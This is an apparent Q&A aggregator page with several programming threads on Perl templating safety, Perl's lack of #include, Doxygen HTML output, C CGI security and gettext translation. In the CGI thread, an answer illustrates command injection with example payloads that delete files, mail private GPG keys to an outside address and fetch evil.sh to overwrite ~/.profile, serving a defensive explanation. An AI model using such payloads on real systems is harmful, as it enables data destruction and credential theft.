Perl: Safe templating language

Perl: Safe templating language - perl

Here are already several questions in SO about the safe template languages, like:
Safe ERB Language?
templating system that is safe for end users to edit
Is there a “safe” subset of Python for use as an embedded scripting language?
Is Django's templating markup for views safe for end user editing like rails liquid templating
but the above questions are for asp, ruby, python.
My question is: What templating language can allow to be edited by users in perl based web-app?
I want allow for users edit pages, (like in an wiki) with some programming possibilities, so full featured mean with cycles, conditionals, variable substitutions, includes and so on.
Is TT "enough safe"? Is here another solution as TT?

Template::Toolkit Should be fine, as long as you limit what parameters are passed to the template. If you pass classes, the templates will be able to call any method on those classes, and any method on the return values of those classes, etc. It's much better to only pass Hashes.
HTML::Template Is also a good option, and it only allows hashes by default, so you are much less likely to leave open a hole that lets the template authors execute arbitrary code.
In either case, make sure that you read the documentation for whatever you use, and clean the output in order to prevent cross-site scripting attacks. Do not rely on people customizing the templates to get the output encoding correct for you.

Related

Racket - is it possible to define and use the same language in a single file?

I like to write code using org-mode and ob-racket. It works quite well for my purposes (mostly pragmatic scripting and solving code challenges as I slowly learn the patterns of this cool language). I am trying to understand language creation and a limitation is that ob-racket as is will only ever generate a single file for me, yet every example of creating a custom language I can find (largely just Beautiful Racket) uses separate files for the language definition and its usage.
I would assume - this being lisp after all - that it is possible to define a custom reader and/or a custom extender and then use them all in the same file. Can someone give me an example of how to do this or is it not doable?

Perl does not have a simple #include, OK, but WHY?

Perl does not have a C style preprocessor level "include" function. That is how it is, and there are numerous sites that explain how to more or less emulate the same sort of behavior.
The one thing I couldn't find on any of these sites is any explanation for WHY perl does not have this functionality. Given that Perl often provides many different ways to accomplish the same thing, it is a curious omission.
Can somebody please explain why the decision was made to exclude this sort of functionality?

Perl already has require, do, eval and here documents among other things. It doesn't need a builtin preprocessor, if you need one that badly, there are filters. http://perldoc.perl.org/perlfilter.html
In general, nobody wants #include, even C and C++ programmers would mostly be happy to give it up in exchange for:
Faster compiles
Clean module system
#include is legacy, period. If a mainstream language designer announced tomorrow that they were adding #include to (your favorite language here) you'd probably see mass hysteria, laughing, and loss of confidence in that designer.
Language designers don't implement #include in any new language, there are simply better ways to do it. In general the trend is to attempt to achieve single pass lexing. Preprocessing requires you to incrementally expand #includes and potentially revisit the same characters repeatedly. It has been wrought with problems, and is one of the reasons that C++ is such dog to compile. It was ok in the 60s and 70s when memory and CPU were tiny and languages and problems were simpler, as were codebases. Nowadays, you want to be able to compile a "library" once, store its type metadata with it so the compiler can access it efficiently without rescanning it. That is what Microsoft does anyway with precompiled headers.
So what would #include be good for?
Modules ? No. See above. Modules are compiled once, export their metadata efficiently, they don't pollute the namespace of the clients, they don't recursively inject other includes, they can be distributed in binary form, among umpteen other advantages that I'm not even smart enough to think of.
Including macros ? No. Replace with constants, inlining and generic programming. All of which can be precompiled and expored from a module.
Splicing in generated code ? Better ways to do it anyway. See modules.
The only useful functionality for the preprocessor, IMO, is conditional compilation.
#ifdef _WIN32_
// do windowsy stuff
#else
#endif
Again, Perl can do this with do, eval or require as well.

Perl doesn't have or lack it any more than C does.
The C preprocessor was designed such that it and C need to know as little as possible about each other. There is no reason why you can't use it with Perl.
So why don't Perl programmers do it?
As codenhein explains, it's generally a bad idea to use an include mechanism with a compiler that don't know anything about each other, as it leaves you open to some crazy errors that neither can diagnose; the fact that C programmers are used to it doesn't change that.

Lightweight doxygen html output

Is there for doxygen is a more lightweight HTML backend, which does not fill the page with tons of divs and tables? When looking at the css file, the output seems quite bloated. It possible to write another backend. I ask if there already exists one.
Reasons why I need this
It makes it easier to integrate the dox with the rest of the website.
I use hyphenate.js to make my "Related Pages" look good. But that script needs to know which tags it should use. This is much easier with less bloat markup.
Doxygen lacks complete documentation on how the output markup making reverse engineering using Firefox Web Developer tool necessary to modify the 1k lines CSS file. Less bloat markup makes less need for documentation, and it makes documentation more easy for Dimitri to maintain.
Less bloat markup makes the pages more portable.

With doxygen you can export your data in html format, tex format, XML (which you can later parse as you want), RTF, Man pages or Docbook.
The html output supports a custom header, footer and stylesheet (CSS) with the HTML_STYLESHEET attribute which might be what you want. You can rewrite those and adjust the output as you like.
If nothing satisfies you, then you might start thinking manually parsing one of the outputs above with your own scripting language and generate the desired format by yourself (if that suits you) or taking over control of the output generation directly via doxygen sources (https://github.com/doxygen/)
Sources: http://www.doxygen.nl/manual/output.html

What you need to do really depends on exactly what you want to end up with.
There are 'Input Filters', eg: ftp://ftp.rsa.com/pub/dsg/public/doxygen/doxyfilt.pl and 'Output Filters, eg: http://www.bigsister.ch/doxygenfilter/doxygenfilter.html . Writing a customized Filter should do exactly what you want. Using existing Code and putting up with it's limitations will be faster and may provide ideas for writing your own Program (if you wish to do so).
You can try this Website http://www.dirtymarkup.com/ with the output that you object to and see if one of the Tools it suggests will "clean" the Code up enough to your liking without removing too much functionality (IE: the ability to click on Links and expand / contract Sections).
If you really want it 'raw' try HTML2Text https://pypi.python.org/pypi/html2text and then you can 'wrestle it back' with Text2HTML http://txt2html.sourceforge.net/ . That will strip it bare and yet give you back some minimal HTML functionality (preserve Linking).
There are MANY 'HTML <-> Text' converters, in many Languages, use a Search Engine to find your own Source; one that is most suitable for you.
Here is a List of Tools from a reputable Site: http://www.w3.org/Tools/html2things.html .
Here is an List of alternates to convert Languages to HTML: http://www.w3.org/Tools/Prog_lang_filters.html . More Info here: http://www.w3.org/Tools/Filters.html .

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.

As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see just off hand, you are using the "system()" call directly on <the_message> ; Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account#hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
A slightly deeper look
Okay so what's going on in terms of using C; Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with main focus on C for last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyways and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project I had to debug and harden and augment it because it had some horrible buffer over flow issues left right and center, non-existant utf-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

Translating longer texts (view and email templates) with gettext

I'm developing a multilingual PHP web application, and I've got long(-ish) texts that I need to translate with gettext. These are email templates (usually short, but still several lines) and parts of view templates (longer descriptive blocks of text). These texts would include some simple HTML (things like bold/italic for emphasis, probably a link here or there). The templates are PHP scripts whose output is captured.
The problem is that gettext seems very clumsy for handling longer texts. Longer texts would generally have more changes over time than short texts — I can either change the msgid and make sure to update it in all translations (could be lots of work and very error-prone when the msgid is long), or I can keep the msgid unchanged and modify only the translations (which would leave misleading outdated texts in the templates). Also, I've seen advice against including HTML in gettext strings, but avoiding it would break a single natural piece of text into lots of chunks, which will be an even bigger nightmare to translate and reassemble, and I've also seen advice against unnecessary splitting of gettext strings into separate msgids.
The other approach I see is to ignore gettext altogether for these longer texts, and to separate those blocks in external subtemplates for each locale, and just include the one for the current locale. The disadvantage is that I'm separating the translation effort between gettext .po files and separate templates located in a completely different location.
Since this application will be used as a starting point for other applications in the future, I'm trying to come up with the best approach for the long term. I need some advice for best practices in such scenarios. How have you implemented similar cases? What turned out to work and what turned out a bad idea?

Here's the workflow I used, on a very heavily-trafficked site that had about several dozen long-ish blocks of styled textual content, translated into six languages:
Pick a text-based markup language (we used Markdown)
For long strings, use fixed message IDs like "About_page_intro_markdown" that:
describes the intent of the text
makes clear that it will be interpreted in markdown format
Have our app render "*_markdown" strings appropriately, making sure to allow only a few safe HTML tags
Build a tool for translators that:
shows them their Markdown rendered in realtime (sort of like the Markdown dingus)
makes it easy for them to see the now-authoritative base language translation of the text (since that's no longer in the msgid)
Teach translators how to use the new workflow
Pros of this workflow:
Message IDs don't change all the time
Because translators are editing in a safe higher-level syntax, hard to mess up HTML
Non-technical translators found it very easy to write in Markdown, vs. HTML
Cons of this workflow:
Having static unchanging message IDs means changes in the text need to be transmitted out of band (which we'd do anyway, as long text can raise questions about tone or emphasis)
I'm very happy with the way this workflow operated for our website, and would absolutely recommend it, and use it again. It took a couple of days to get started, but it was easy to build, train, and launch.
Hope this helps, and good luck with your project.

I just had this particular problem, and I believe I solved it in an elegant way.
The problem: We wanted to use Gettext in PHP, and use primary language strings as keys translations. However, for large blocks of HTML (with h1, h2, p, a, etc...) I'd either have to:
Create a translation for each tag with content.
or
Put the entire block with tags in one translation.
Neither of those options appealed to me, so this is what I did:
Keep simple strings ("OK","Add","Confirm","My Awesome App") as regular Gettext .po entries, with the original text as the key
Write content (large text blocks) in markdown, and keep them in files.
Example files would be /homepage/content.md (primary / source text), /homepage/content.da-DK.md, /homepage/content.de-DE.md
Write a class that fetches the content files (for the current locale) and parses it. I then used it like:
<?=Template::getContent("homepage/content")?>
However, what about dynamic large text? Simple. Use a templating engine. I decided on Smarty, and used it in my Template class.
I could now use templating logic.. within markdown! How awesome is that?!
Then came the tricky part..
For content to look good, at times you need to structure your HTML differently. Consider a campaign area with 3 "feature boxes" beneath it. The easy solution: Have a file for the campaign area, and one for each of the 3 boxes.
But I could do better than that.
I wrote a quick block parser, so I would write all the content in one file, and then render each block seperately.
Example file:
[block campaign]
Buy this now!
=============
Blaaaah... And a smarty tag: {$cool}
[/block]
[block feature 1]
Feature 1
---------
asdasd you get it..
[/block]
[block feature 2] ...
And this is how I would render them in the markup:
<?php
// At the top of the document...
// Class handles locale. :)
$template = Template::getContent("homepage/content", [
"cool" => "Smarty variable! AWESOME!"
]);
?>
...
<title><?=_("My Awesome App")?></title>
...
<div class="hero">
<!-- Template data already processed! :) -->
<?=$template->renderBlock("campaign")?>
</div>
<div class="featurebox">
<?=$template->renderBlock("feature 1")?>
</div>
<div class="featurebox">
<?=$template->renderBlock("feature 2")?>
</div>
I'm afraid I can't provide any source code, as this was for a company project, but I hope you get the idea.

gettext wasn't really designed for translating large pieces of text.
fwiw I've included basic HTML (strong, a, etc) in gettext strings as I was confident our translators knew what they were doing (mostly right) and that the translations would be well tested.
I've tried the approach of breaking up the text into one string per paragraph. Roughly as it looks odd if there's one paragraph of English in the middle of the text. Where one of those strings have changed this has meant that we have had to wait for translations before releasing a new version, which has slowed us down. On the plus side it's easy for translators to see which part of the text has changed. This approach worked well for the one application I've tried it with.
Splitting some text out into external locations also worked, but it caused management overhead, rather than just a .po file or two, there was a whole bunch of other text that had to be manually compared to the English version and updated accordingly. This is doable if you remember to provide notes to your translators explaining where and what the difference was in the English version.
I'm still not sold on either approach myself.

We Keep Coding

iphone swift flutter scala powershell matlab mongodb postgresql perl eclipse